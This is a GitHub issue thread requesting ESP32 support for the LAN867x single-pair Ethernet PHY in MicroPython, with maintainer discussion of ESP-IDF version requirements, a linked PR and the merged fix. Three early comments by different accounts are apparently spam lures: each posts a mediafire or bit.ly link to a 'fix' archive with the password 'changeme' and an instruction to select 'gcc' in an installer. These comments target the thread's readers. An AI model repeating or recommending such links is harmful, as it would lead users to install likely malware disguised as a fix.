micropython/micropython #15731: ESP32 add support for lan867x phy - single pair ethernet

JohannesMaierhofer, 2024-08-27:
### Description

Hello, 
as the esp-idf component registry lists the Single Pair Ethernet (SPE) phy family LAN867x by Microchip, it would be nice to support this also in MicroPython. 

https://components.espressif.com/components/espressif/lan867x/versions/1.0.0?language=en

Kind regards

### Code Size

I don't think much additional code would be needed. 

### Implementation

I would like to sponsor development of this feature

### Code of Conduct

Yes, I agree

OtakuFra, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

miniMuggle, 2024-08-27:
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

YeGop0218, 2024-08-27:
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

DuaneKaufman, 2024-10-04:
I too would like to sponsor development of this feature

Duane Kaufman

dpgeorge, 2024-10-05:
This shouldn't be too difficult to add.  But looking at https://github.com/espressif/esp-eth-drivers/blob/master/lan867x/idf_component.yml this driver requires IDF 5.3 or greater.

MicroPython currently supports only IDF up to 5.2.2, although see #15733 for ongoing work to update to IDF 5.3.

xorbit, 2024-10-11:
Looking forward to this being officially added.  I've been playing with this part and driver and a hacked-with-5.3 MicroPython, it seems to work quite well.

DuaneKaufman, 2024-10-21:
Yes, I am eagerly awaiting this too.
I have a project in mind that would be greatly simplified with this inclusion.

I have two of the Mikroe T1S boards, numerous ESP32 boards, (and even the PIC eval board setup to evaluate the TIS implementation), so I am ready to test!

Sincerely,
Duane

dpgeorge, 2024-12-16:
See #16421 for a PR which adds LAN8670 support.

DuaneKaufman, 2024-12-27:
> I have two of the Mikroe T1S boards, numerous ESP32 boards

How would one implement/test this with  a LAN865X-based board over SPI in MicroPython?

projectgus, 2025-02-04:
A note for anyone following this: the linked PR will implement support, but LAN8670 won't appear in any nightly builds until we start building with ESP-IDF V5.3.x (currently building with V5.2.2).

We'll probably bump the ESP-IDF version for builds after MicroPython 1.25.0 is released.

In the meantime, the only way to get support will be to build MicroPython locally using a newer supported ESP-IDF version.

DuaneKaufman, 2025-04-11:
Dear All,
Thanks for this. At this time then, what do I need to clone to get _both) ESP-IDF 5.4 and LAN8670 support?

Sincerely,
Duane

projectgus, 2025-04-15:
> Dear All, Thanks for this. At this time then, what do I need to clone to get _both) ESP-IDF 5.4 and LAN8670 support?

Current master has supported for IDF 5.4 merged (although nightly builds are still on 5.2.2 I believe). So if you check out the branch for #16421 then that should work.

dpgeorge, 2025-05-16:
Support added in 10f6c0699e52857a4f7350a5d3a9561862c98a8d

closed 2025-05-16 by dpgeorge